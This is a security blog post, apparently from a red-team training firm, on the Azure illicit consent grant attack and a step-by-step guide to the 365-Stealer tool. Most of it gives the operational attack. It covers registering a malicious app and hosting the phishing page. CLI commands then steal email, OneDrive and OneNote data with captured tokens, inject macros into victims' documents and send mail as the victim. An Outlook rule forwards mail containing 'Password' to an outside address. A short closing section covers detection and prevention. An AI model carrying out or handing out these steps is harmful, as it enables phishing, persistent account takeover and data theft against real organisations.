Initial Access Attack in Azure - Understanding and Executing the Illicit Consent Grant Attack in 2025
- Vishal Raj
- 3 days ago
- 18 min read
Table of Contents:
Importance of Initial Access in 2025:
Initial Access techniques continue to be an important part of a red team operation. When it comes to attacking Azure and Entra ID, initial access techniques are very limited.
With Microsoft's mandatory MFA enforcement, any initial access method that depends on user credentials (like Password Spraying, Compromised Credentials, Initial Access Brokers) has lesser impact.
This blog post details a technique that still works, even with mandatory MFA enforcement in Entra ID – Illicit Consent Grant.
Introduction to Illicit Consent Grant Attack and 365-Stealer:
As organizations shift more of their operations to cloud services like Microsoft 365, attackers are refining their tactics and technique to exploit these environments. One particularly effective yet often underestimated method is the Illicit Consent Grant (ICG) attack. In this type of attack, malicious applications trick users into granting permissions, allowing attackers to access sensitive data without the user’s awareness. 365-Stealer was developed to streamline and automate this attack process.
365-Stealer is a Python3-based tool crafted to automate consent grant attacks. These attacks work by convincing users to authorize a malicious application, which then gains access to a refresh token. This token is a valuable asset, as it allows attackers to generate new tokens and maintain continuous access to the user’s Microsoft 365 account—without needing further involvement from the user. With this access, attackers can retrieve critical information, such as emails, files on OneDrive, and notes, presenting a serious security threat.
Executing consent grant attacks manually can be tedious, involving numerous steps to obtain and use tokens, which is impractical for large-scale attacks. 365-Stealer simplifies the process by automating these steps, reducing what could take hours or days to just a few minutes, making it highly efficient for attackers.
365-Stealer offers two interfaces to meet different user preferences:
CLI (Command Line Interface) – Written in Python3, the CLI provides precise control, allowing users to manage token theft and execute commands efficiently.
Web UI (User Interface) – Built with PHP, the Web UI offers a graphical approach for those who prefer an intuitive, user-friendly interface. Python3 operates in the background to handle core processes.
With its CLI and Web UI, 365-Stealer offers a streamlined pathway for accessing Microsoft 365 accounts, making it essential for understanding cybersecurity risks today. In the following sections, we’ll explore how the tool operates, its architecture, and its implications for security.
The technique and tool (365-Stealer) used in ICG attack, is extensively covered in both the Certified by Altered Seucirty Red Team Professional for Azure (CARTP) and Certified by A;tered Security Red Team Expert for Azure (CARTE) courses by AlteredSecurity.
Understanding the Flow of Illicit Consent Grant Attacks with a Scenario: ECorp vs. PentestCorp
To further explain how an ICG attack works, let's create a hypothetical scenario where two fictitious organizations are involved: ECorp and PentestCorp.
ECorp is a large organization that uses Microsoft 365 services to manage emails, files, notes, and other sensitive business data.
PentestCorp is a cybersecurity firm hired by ECorp to perform a phishing simulation with the goal of testing ECorp's defenses. The objective is to see if they can trick users into granting access to their Microsoft 365 data (emails, OneDrive files, OneNote, etc.) using an ICG attack.
In this simulation, PentestCorp will attempt to carry out a consent phishing attack, following the same flow that a real attacker might use.
In this simulation, PentestCorp will attempt to carry out a consent phishing attack, following the same flow that a real attacker might use.
Step 1: PentestCorp Develops a Malicious Application
PentestCorp develops an app within its own Microsoft 365 tenant that appears legitimate and requests permissions such as:
Read and write access to emails (Microsoft Outlook)
Full access to files on OneDrive
View and edit access to OneNote documents
Step 2: Sending the Phishing Link
PentestCorp then emails ECorp employees, posing as IT support, with a link to this app. The email mimics a legitimate communication about a new productivity tool rollout.
Step 3: The User Grants Consent
An unsuspecting employee, Alice, clicks the link and is directed to a real Microsoft 365 login page. The app requests permissions like:
Read emails
Access and edit OneDrive files
Send emails as Alice
Assuming Alice has the necessary admin privileges, she is able to grant these permissions, which require admin consent. Believing it’s a legitimate request, she clicks "Accept," unknowingly giving full access to her account.
Step 4: PentestCorp Receives the Authorization Code
Once Alice consents, Microsoft sends an authorization code back to PentestCorp, allowing them to generate access tokens and refresh tokens for ongoing access to Alice’s account.
Step 5: PentestCorp Uses the Access Token
With the access token, PentestCorp:
Reads Alice’s emails to extract sensitive information.
Downloads critical files from OneDrive.
Accesses OneNote for confidential notes and passwords.
Since PentestCorp has a refresh token, they maintain persistent access to Alice's account, renewing access tokens without her needing to re-authenticate.
Why This Attack Is So Dangerous for ECorp
In this simulation, PentestCorp demonstrated how easy it is to trick users into giving away access without compromising their login credentials. Even though Alice's Microsoft 365 account may be protected by multi-factor authentication (MFA), these security measures are bypassed in a consent grant attack because the victim voluntarily gives permission to the attacker's app.
The real threat here is that the activity appears legitimate: the app has been authorized by the user, and the attacker is using legitimate access tokens to interact with Microsoft 365 services. This makes it extremely difficult for security systems to detect malicious behavior.
The 365-Stealer Tool: Features and Setting Up the Attacking Environment
The 365-Stealer tool simplifies ICG attacks on Microsoft 365, offering both command-line and web interfaces for efficiency. This section covers its key features and guides you through setting up the attacking environment, including manual Azure app registration and automation using provided scripts.
Key Features of 365-Stealer
Steals Refresh Tokens: The tool captures refresh tokens from victims, which can be used to generate new access tokens for at least 90 days, providing ongoing access to their accounts..
Send Emails on Behalf of Victims: 365-Stealer can send emails with attachments from the victim’s account to other users without their knowledge.
Create Malicious Outlook Rules: It can create harmful rules in the victim’s Outlook, such as forwarding any incoming mail to an attacker-controlled email.
Upload Files to OneDrive: The tool can upload any file into the victim's OneDrive account.
Steal Data from OneDrive, OneNote, and Email: 365-Stealer can extract files from OneDrive, OneNote, and dump all emails, including attachments, from the victim’s account.
Manage Stolen Data: The 365-Stealer Management Portal allows attackers to manage all compromised data, including refresh tokens, emails, files, and users.
Backdoor OneDrive Documents: The tool can backdoor a .docx file stored in OneDrive by injecting malicious macros and replacing the file extension with .doc.
Store Compromised Data: All collected information, such as refresh tokens, emails, files, and user data from the victim’s tenant, along with configurations, are stored in a database.
Customizable Delay for Data Theft: Attackers can delay requests by specifying a time in seconds to avoid detection while stealing data.
Host a Phishing Application: The tool can host a fake application for performing ICG attacks using the --run-app command in the terminal or via the 365-Stealer Management portal.
Selective Token Theft: Using the --no-stealing flag, the tool can steal only the tokens without further actions, allowing attackers to exploit them later.
Request New Access Tokens: The tool allows attackers to request new access tokens for all users or specific users within the compromised tenant.
Generate Access Tokens Using Credentials: With the --refresh-token, --client-id, and --client-secret flags, attackers can easily obtain new access tokens.
Automate Azure App Registration: The --app-registration flag automates the process of Azure app registration, making it easier to set up the attack infrastructure without manual intervention.
Selective Data Theft: With the --custom-steal flag, attackers can selectively steal data from specific sources like OneDrive, Outlook, etc.
Shared Data: All compromised data is saved in a database.db file, which can be shared with our team to leverage the existing stolen tokens and data.
Search and Filter Emails: Attackers can search for specific emails by keyword, subject, user’s email address, or filter emails with attachments using the 365-Stealer Management portal.
Export User Data: The tool allows attackers to dump user information from the compromised tenant and export the data to a CSV file for further analysis or use.
Setting Up the Attacking Environment
In this section, we'll guide you through setting up the necessary components for launching an ICG attack using 365-Stealer. We'll cover registering an application in Azure through Azure Portal and setting up a local web server with XAMPP.
Registering a New Application in Azure:
The first step in setting up an environment for consent grant attacks is to register a malicious application in Azure that will request access to the victim's Microsoft 365 account.
Access the Azure Portal:
Navigate to portal.azure.com and log in with your Azure account.
Create a New Application:
Go to Microsoft Entra ID in the left-hand menu.
Under Manage, click on App registrations.
Select New registration and fill in the application details:
Name: Choose a relevant name (e.g., "ProductivityApp").
Supported account types: Select Accounts in any organizational directory.
Redirect URI: Use a valid URL (e.g., https://localhost/login/authorized if testing locally).
Configure API Permissions:
After registering the app, click on API permissions.
Select Add a permission > Microsoft Graph > Delegated permissions.
Add permissions such as (required by 365-Stealer):
Generate Client Secrets:
In the left-hand menu, go to Certificates & secrets.
Click 'New client secret', set a description and expiration date, and save the secret value securely.
Setting Up a XAMPP Server and Configuring the Database
To fully utilize the web-based interface of 365-Stealer, you will need to set up a local web server using XAMPP and configure the necessary database tables.
Step 1: Install XAMPP for Windows
Download XAMPP for Windows from the official website.
Run the XAMPP installer and follow the on-screen instructions to complete the installation.
Step 2: Enable sqlite3 in Apache server
Open Xampp server, click on config of Apache and select PHP (php.ini)
Search for extension=sqlite3 and remove ; from the begining as it is considered as a comment and then save the file.(File location: C:\xampp\php\php.ini)
Step 3: Move the 365-Stealer Project to XAMPP htdocs
Copy the 365-Stealer project to the XAMPP htdocs directory:
copy C:\path\to\365-Stealer C:\xampp\htdocs\Step 4: Start Apache and MySQL Services on XAMPP
Open the XAMPP control panel from the Start menu.
Start the Apache and MySQL services by clicking on the "Start" buttons next to them.
Step 5: Visit phpMyAdmin Page
Open a web browser and go to http://localhost/phpmyadmin.
Create a new database named database-1:
Click on the "New" button in the left sidebar.
Enter database-1 in the "Database name" field and click on "Create".
Create a table named login with 6 columns:
Click on the database-1 database in the left sidebar.
Click on the "SQL" tab and run the following SQL command:
CREATE TABLE login (
username VARCHAR(30) NOT NULL,
password VARCHAR(256) NOT NULL,
is_password_changed TINYINT(1) NOT NULL,
last_password_change DATE NOT NULL,
role VARCHAR(10) NOT NULL DEFAULT 'user',
status VARCHAR(10) NOT NULL DEFAULT 'active'
);
Insert values into the login table:
Click on the login table in the left sidebar.
Click on the "Insert" tab and enter the following values:
username: admin (*Note: Use user name as admin)
password: <Password> (*Function = password_hash() PHP function)
is_password_changed: 0
last_password_change: Current Date
role: admin
status: active
Step 6: Implement Brute Force Protection
To prevent brute force attacks, create a failed_logins table and implement logic to block IP addresses after a certain number of failed attempts.
Create the failed_logins table by running the following SQL command:
CREATE TABLE failed_logins (
id INT AUTO_INCREMENT PRIMARY KEY,
username VARCHAR(50) NOT NULL,
ip_address VARCHAR(45) NOT NULL,
attempt_time DATETIME NOT NULL,
successful TINYINT(1) DEFAULT 0
);
Step 7: Change the Root Password through phpMyAdmin
Open phpMyAdmin and log in.
Click on the "User accounts" tab.
Find the root user name under "User name" and localhost under "Host name" and click on "Edit privileges".
Scroll down to the "Change password" section and enter the new password.
Click on "Go" to save the changes.
Step 8: Update the connection.php file
Open the connection.php file in the 365-Stealer project:
C:\xampp\htdocs\365-Stealer\yourVictims\connection.phpUpdate the password variable with the root password set in Step 7:
$password = 'your_root_password';Step 9: Update the config.inc.php file
Open the config.inc.php file:notepad
C:\xampp\phpMyAdmin\config.inc.phpMake the following changes:
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['password'] = '';Step 10: Change Apache Web Server Ports (Optional):
If you want to run the Apache web server on different ports instead of the default HTTP (80) and HTTPS (443) ports, you will need to modify two configuration files: httpd.conf and httpd-ssl.conf. For this setup, we will be using port 82 for HTTP and port 8443 for HTTPS.
Steps to Change the Port Numbers:
Edit the httpd.conf File:
Open the XAMPP Control Panel.
Click on Config next to Apache and select Apache (httpd.conf).
Look for the line that specifies the Listen 80 directive (typically near the top):
Change it to Listen 82.
Edit the httpd-ssl.conf File (For HTTPS):
Go back to the XAMPP Control Panel, click Config next to Apache, and this time select Apache (httpd-ssl.conf).
Find the line that specifies the Listen 443 directive for HTTPS (usually around line 40):
Change it to Listen 8843
Next, locate the SSL Virtual Host Context for port 443 (usually near the bottom of the file) and change the port number to 8443.
Step 11: Restart Apache and MySQL Services
Open the XAMPP control panel from the Start menu.
Stop and then start the Apache and MySQL services.
Configuring 365-Stealer Management portal
After setting up the XAMPP server and configuring the database, the next step is to set up and configure the 365-Stealer Management Portal, which allows us to manage the tool and track stolen tokens through a web interface.
Modify Paths in the Management Portal (index.php)
To ensure the 365-Stealer Web UI works correctly, you may need to adjust file paths (e.g., 365-Stealer.py, database paths, Python3 executable) in "C:/xampp/htdocs/365-Stealer/yourvictims/index.php" if they differ from the default setup.
Handling Spaces in Paths
If your Python3 installation is located in a directory with spaces (e.g., C:/Program Files/), it is important to enclose the full path in double quotes ("). This avoids errors that can occur due to spaces in directory names.
Setting Up 365-Stealer for an Attack
Once the 365-Stealer Management Portal is set up, the final step is to configure the tool with the necessary settings to launch consent grant attacks and retrieve sensitive information from the target. Follow the steps below to configure 365-Stealer after logging into the management portal.
Access the 365-Stealer Login Page
Open your browser and navigate to the 365-Stealer login page:
Enter the username and password that were created during the database configuration and entry setup.
Configuring 365-Stealer
After logging in to the 365-Stealer portal, click on 365-Stealer Configuration from the dashboard. Here’s what you need to fill out to get the tool running:
Client ID: Enter the Application (Client) ID from your Azure app, found in the Overview section of the app in the Azure portal.
Client Secret: Copy the Secret Value from the Certificates & Secrets tab of your Azure app.
Redirect URL: Provide the Redirect URL you set during app registration. This is where the victim will be sent after granting consent (e.g., https://<Your-Domain>/login/authorized). Make sure it matches the URL in your Azure app configuration.
Macros Location (optional): Specify the path to the macro file you want to inject into the victim’s system for automated tasks.
OneDrive File Extensions: List the file extensions you want to target when downloading from OneDrive (e.g., txt, pdf, docx). If you want to download all files, simply use *.
Delay: Set a delay (in seconds) between requests to avoid detection, e.g., a 5-second delay means the script waits 5 seconds between each request.
Click Save to finish the configuration and you're ready to capture tokens and download files from OneDrive or Microsoft 365 services..
Note: We can also use the --set-config option when using 365-Stealer CLI to perform the configuration. Whether the configuration is done through the Management Portal or via the CLI, both methods achieve the same result and apply the same settings.
Running the 365-Stealer Attack Against a Victim
In this section, we’ll demonstrate how to launch a consent grant attack using both the 365-Stealer Management Portal and the 365-Stealer CLI. For ethical testing, we are using a non-production account or a test user to test the tool and simulate the attack scenario in a controlled environment.
Important Note:
Make sure that you are only testing 365-Stealer on environments or accounts that you have explicit permission to test, such as non-production environments, test users, or through a legal pentesting agreement.
Part 1: Running the Attack Using the 365-Stealer Management Portal
Before launching an attack, it's essential to configure the 365-Stealer Management Portal for secure HTTPS communication. This ensures that all interactions between the victim and the attacker’s server are encrypted. Create a Self-Signed Certificate for HTTPS.
Create a Self-Signed Certificate:
You can create a self-signed certificate from SelfSignedCertificate.com.
After generating the certificate, download the .cert and .key files.
Rename the Certificate Files:
Rename the certificate files to server.cert and server.key respectively.
Place both files in the directory where the 365-Stealer.py file is located. If testing, sample server.cert and server.key files are already provided for demonstration purposes.
Disclaimer:
We are using a self-signed certificate only for testing within a controlled lab environment. This method is not secure for using in public system, as self-signed certificates are not trusted by browsers.
Login to the Management Portal:
Open your browser and navigate to the 365-Stealer login page:
Enter your credentials to log in.
Ensure Configuration is Complete:
Before launching the attack, ensure that you have properly configured the portal as outlined in the previous steps (Client ID, Client Secret, Redirect URL, etc.).
Click on "Run 365-Stealer" and Set Port/Protocol:
Once logged in, click on the "Run 365-Stealer" button.
A dialog box will appear (as shown in the image below). Here, you can choose between HTTP or HTTPS and set the desired port number to run the tool (e.g., port 443 for HTTPS or 80 for HTTP). Click Run to start the portal.
Copy the Phishing Link:
After clicking Run, a PowerShell or terminal window will open (as shown in the screenshot). This window will display the generated phishing link.
Copy the phishing link from the terminal window and send it to the demo/test victim (e.g., via email or another method).
Once you have the phishing link, you can also visit the Domain/IP yourself to see how the phishing page appears. The page will look like a legitimate Microsoft login page where the victim would be asked to authorize access.
Sending the Phishing Link to the Victim and Monitoring the Attack
After generating the phishing link using 365-Stealer, the next critical step is to send the link to the target victim. For the purpose of this blog, we are simulating an attack on a test or non-production account.
Here’s an example of what the 365-Stealer tool looks like when capturing the tokens:
Access the Captured Data
Access Tokens: View the captured access token in the portal, giving you access to the victim's Microsoft 365 account.
User Info: Access details about the users’s account.
Emails: Filter and access the victim’s emails.
Decode Token: Decode the captured token to view its contents.
Outlook: Access emails and other Outlook data.
OneDrive: Browse and download OneDrive files.
Part 2: Running the Attack Using the 365-Stealer CLI
In this section, we will demonstrate how to run the attack using the 365-Stealer CLI. The CLI provides a versatile and powerful way to configure, execute, and manage attacks through various commands and options.
Getting Help with the CLI (--help)
Before starting, it’s important to familiarize yourself with the available options and commands. You can view all the available options by using the --help flag:
python 365-Stealer.py --helpThis will display a list of available commands, including configuration, token usage, and stealing options.
Configuring the Tool
Setting the Configuration:
You can set up your configuration for 365-Stealer using the --set-config option. This will prompt you to enter the required values such as Client ID, Client Secret, and Redirect URL
python 365-Stealer.py --set-configGetting the Current Configuration:
If you want to verify the current configuration, use the --get-config option:
python 365-Stealer.py --get-configRunning the Attack Application
You can run 365-Stealer as an application with a specific port (e.g., port 443 for HTTPS) by using the following command:
python 365-Stealer.py --run-app --port 443Stealing Data Using Access Tokens and Refresh Tokens
Stealing Data Using an Access Token
If you already have an access token, you can directly use it to steal data from the victim's Microsoft 365 account:
python 365-Stealer.py --token eyJhbGciOiJIUzI1NiIsI......Stealing Data Using an Access Token File
You can also provide a file containing the access token:
python 365-Stealer.py --token-path access_token.txtStealing Data Using a Refresh Token
If you have a refresh token, you can use it along with the Client ID and Client Secret to generate a new access token and start stealing data from the victim’s account (e.g., OneDrive, Tenant info, Outlook, etc.):
python 365-Stealer.py --refresh-token 0.AVYAtzqsrF9F7kKD42szT... --client-id 147a06c9-5b35-4955-b64b-9625ab481fdc --client-secret mYidUM0-bc9QNE9B.62EaSuEF6~n_P_6Z-Getting a Token Using an Authorization Code
You can also obtain an access token and refresh token using an Authorization Code and start the stealing process:
python 365-Stealer.py --code 0.AVYAtzqsrF9F7kKD42szTL... --client-id 147a06c9-5b35-4955-b64b-9625ab481fdc --client-secret mYidUM0- bc9QNE9B.62EaSuEF6~n_P_6Z- --redirect-url https://dummyecorp.com/login/authorizedAdvanced Stealing Options
Targeting a Specific User
To target a specific user and steal their data (e.g., emails, OneDrive files), use the --refresh-user option:
Note: This will only work if the user's refresh token is already present in the Database.
python 365-Stealer.py --refresh-user pprice@dummyecorp.comDeleting Specific User Data
To delete data for a specific user, use the --delete-user-data option:
python 365-Stealer.py --delete-user-data pprice@dummyecorp.comCustom Steal
Custom Steal allows you to retrieve specific types of data from a victim's Microsoft 365 account, tailored to your requirements. You can specify which services or data to steal, such as emails, OneDrive files, or OneNote content.
To execute a Custom Steal for a specific user, you can use the following command:
python 365-Stealer.py --refresh-user pprice@dummyecorp.com --custom-steal outlook, onenoteThis command will steal the Outlook emails and OneNote data from the victim’s account.
Following options are allowed for custom steal:
listusers – List all users in the target tenant.
checklicence – Check the licenses of users in the tenant.
outlook – Retrieve emails from Outlook.
onedrive – Download files from OneDrive.
onenote – Retrieve notes from OneNote.
Hosting a phishing app.
HTTPS (443)
python 365-Stealer.py --run-app HTTP (80)
python 365-Stealer.py --run-app --no-ssl Run on Custom Port
python 365-Stealer.py --run-app --no-ssl --port 8080Injecting Macros and Uploading Files
Injecting Macros into OneDrive Files
You can inject malicious macros into OneDrive files (e.g., Word or Excel) and upload the modified files back to the victim’s OneDrive:
python 365-Stealer.py --refresh-user pprice@dummyecorp.com --custom-steal onedrive --injection
Uploading file to onedrive
To upload a file (e.g., user_list.docx) to a victim’s OneDrive, use:
python 365-Stealer.py --refresh-user pprice@dummyecorp.com --upload users_list.docxSending Emails and Creating Outlook Rules
Sending an Email
You can use a predefined JSON file (send-mail.json) to send an email on behalf of the victim:
python 365-Stealer.py --refresh-user pprice@dummyecorp.com --send-mail send-mail.jsonCreating Outlook Rules
To create automated Outlook rules for the victim, use a JSON file (e.g., outlook-rules.json) with the following command:
python 365-Stealer.py --refresh-user pprice@dummyecorp.com --create-rules outlook-rules.jsonSample JSON template for creating outlook rules
{
"displayName": "RuleName",
"sequence": 2,
"isEnabled": true,
"conditions": {
"bodyContains": [
"Password"
]
},
"actions": {
"forwardTo": [
{
"emailAddress": {
"name": "Email test",
"address": "dummy@gmail.com"
}
}
],
"stopProcessingRules": true
}
}Note: We can provide --token-path, --token and --refresh-token as well to execute all of the above useful commands.
All of the above actions can also be performed using the 365-Stealer Management portal.
The 365-Stealer CLI offers powerful flexibility for running attacks, managing data, and interacting with victim accounts. Whether you’re stealing data directly using tokens, injecting malicious content, or automating email workflows, the CLI provides comprehensive options for each stage of the attack process.
Detection and Prevention of ICG
ICG attacks are a growing threat in the world of cloud security, especially in services like Microsoft 365. These attacks exploit the OAuth authorization framework to trick users into granting malicious applications access to sensitive data without their knowledge. To effectively mitigate these attacks, organizations must implement detection, prevention, and remediation strategies.
Here’s a comprehensive guide to help you secure your Microsoft 365 environment against such threats:
Detect and Remediate ICGs
Detecting ICGs is crucial for preventing data breaches. Some ways to monitor and remediate consent attacks include:
Entra ID Sign-In Logs: Regularly review your Entra ID sign-in logs for unusual consent activities. Look for unexpected authorizations or applications requesting excessive permissions.
Remediation: Immediately revoke access for suspicious apps and remove any unapproved tokens by using Azure AD PowerShell commands.
Audit Logs: Enable Microsoft 365 audit logs to track consent activities and pinpoint potential unauthorized access attempts.
Refer to Microsoft’s guide on detecting and remediating illicit consent grants for more details.
Disable User Consent for All Applications
A proactive approach is to disable user consent for all applications unless absolutely necessary. This ensures that users cannot accidentally grant malicious apps access to their accounts.
Steps to disable user consent:
Go to the Microsoft Entra ID admin center.
Navigate to Enterprise Applications > User settings.
Under Users consent Settings select Do not allow user consent and click on save.
This prevents users from granting consent to unverified or malicious apps without administrative oversight.
Implement an Admin Consent Workflow
Instead of allowing users to grant consent, organizations should adopt an admin consent workflow. This requires administrative approval for any app that requests permissions to access sensitive data.
How to implement admin consent:
In Entra ID, go to Enterprise Applications > User settings.
Under Admin consent settings, set Users can request admin consent to apps they are unable to consent to to Yes.
Users can then request approval from admins before granting apps access to critical resources.
This ensures that administrators have full control over which apps are given access, reducing the likelihood of malicious apps slipping through.
Enable Consent for Verified Publishers Only
To further reduce risk, only allow user consent for apps that are published by verified publishers and that request limited permissions. Verified publishers have gone through additional security checks, making them less likely to be malicious.
How to allow consent for verified publishers only:
Go to Entra ID > Enterprise Applications > User settings.
Under User consent settings, set Allow user consent for apps from verified publishers, for selected permissions (Recommended) and save the changes.
Limit the permissions users can grant to low-risk actions, such as User.Read.
This step ensures that only trusted apps from verified publishers can be granted access to your organization's data.
Additional Resources and References
To dive deeper into the prevention, detection, and mitigation of consent grant attacks in Microsoft 365, refer to these insightful resources:
Microsoft Identity Platform and OAuth 2.0 Authorization A comprehensive guide on Microsoft identity platform and OAuth 2.0 authorization code flow
Detect and Remediate ICGs in Microsoft 365 A comprehensive guide from Microsoft on how to detect and remediate ICG attacks in your Microsoft 365 environment.
Consent Grant Attack - Azure AD Attack and Defense This GitHub repository details how consent grant attacks occur and offers defensive strategies in Microsoft Entra ID environments.
Disclaimer
The 365-Stealer tool and this blog are meant only for educational purposes and authorized testing. Misusing the tool without proper authorization is illegal and unethical. Always get permission before performing security tests on any system. The author and contributors are not responsible for any misuse of 365-Stealer.
Thank You for Reading this detailed blog post on 365-Stealer. If you have any questions or feedback, feel free to reach out!
Posted by:
Vishal Raj
Security Researcher at AlteredSecurity